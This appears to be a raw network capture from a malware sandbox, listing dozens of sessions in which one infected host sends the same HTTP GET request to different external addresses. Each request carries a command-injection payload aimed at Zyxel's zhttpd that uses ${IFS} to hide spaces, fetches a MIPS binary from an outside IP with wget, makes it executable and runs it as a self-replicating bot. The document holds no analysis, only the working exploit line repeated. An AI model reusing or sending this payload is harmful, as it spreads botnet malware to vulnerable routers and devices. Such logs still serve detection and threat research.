                                                Jan 29, 2024 07:07:52.426182985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5318192.168.2.2337090160.66.38.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426245928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5319192.168.2.235752464.249.84.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426285028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5320192.168.2.234347014.68.79.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426320076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5321192.168.2.2347214141.228.178.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426373959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5322192.168.2.235800060.244.198.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426429033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5323192.168.2.233939074.42.142.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426482916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5324192.168.2.2349080109.200.190.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426505089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5325192.168.2.2339666177.127.248.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426557064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5326192.168.2.233876071.216.91.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426589966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5327192.168.2.2338602159.96.30.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426637888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5328192.168.2.2349048131.174.44.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426686049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5329192.168.2.2355606106.108.0.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426732063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5330192.168.2.2353988152.165.248.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426755905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5331192.168.2.235373464.110.216.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426788092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5332192.168.2.2349542172.62.190.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426826000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5333192.168.2.2348402115.10.101.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426846981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5334192.168.2.2358932177.119.189.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426876068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5335192.168.2.233834685.229.160.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426919937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5336192.168.2.235768635.99.28.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426947117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5337192.168.2.2334652218.210.50.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427005053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5338192.168.2.234613231.30.135.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427022934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5339192.168.2.2356166108.170.166.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427043915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5340192.168.2.2348008182.44.9.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427087069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5341192.168.2.2358038184.170.226.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427120924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5342192.168.2.2342426187.16.70.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427171946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5343192.168.2.2354338113.216.163.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427212000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5344192.168.2.235127668.250.252.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427257061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5345192.168.2.2334834213.226.202.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427313089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5346192.168.2.2348750153.112.148.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427359104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5347192.168.2.234273625.109.249.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427386045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5348192.168.2.235441474.45.86.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427423000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5349192.168.2.235583259.191.11.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427463055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5350192.168.2.2356994131.69.79.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427514076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5351192.168.2.234199644.126.123.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427544117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5352192.168.2.2359582183.13.10.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427593946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5353192.168.2.2334430108.137.167.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427637100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5354192.168.2.2354526213.41.110.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427689075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5355192.168.2.2359550181.233.9.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427716970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5356192.168.2.2333154121.166.58.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427750111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5357192.168.2.234838862.67.112.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427788019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5358192.168.2.235427867.208.42.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427822113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5359192.168.2.234681474.118.167.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427884102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5360192.168.2.2341640144.116.77.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427933931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5361192.168.2.2351596209.205.50.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427969933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5362192.168.2.235001083.165.233.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.427995920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5363192.168.2.234212082.131.82.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428034067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5364192.168.2.2359730204.232.255.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428086042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5365192.168.2.2355856218.3.64.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428119898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5366192.168.2.2338830178.51.252.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428168058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5367192.168.2.235848270.184.155.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428199053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5368192.168.2.2350528219.231.215.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428251028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5369192.168.2.2341238154.28.245.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428287983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5370192.168.2.2344502198.4.205.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428318977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5371192.168.2.233594636.75.45.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428363085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5372192.168.2.2340192153.228.10.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428410053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5373192.168.2.235521049.212.161.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428447962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5374192.168.2.2345212204.80.8.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428468943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5375192.168.2.2342010150.110.226.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428529024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5376192.168.2.233887073.13.218.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428565979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5377192.168.2.2333406136.193.253.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428616047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5378192.168.2.2352110102.139.45.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428663969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5379192.168.2.235952425.158.233.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428710938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5380192.168.2.2337164190.133.14.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428745985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5381192.168.2.233630087.233.215.20443
                                                TimestampBytes transferredDirectionData
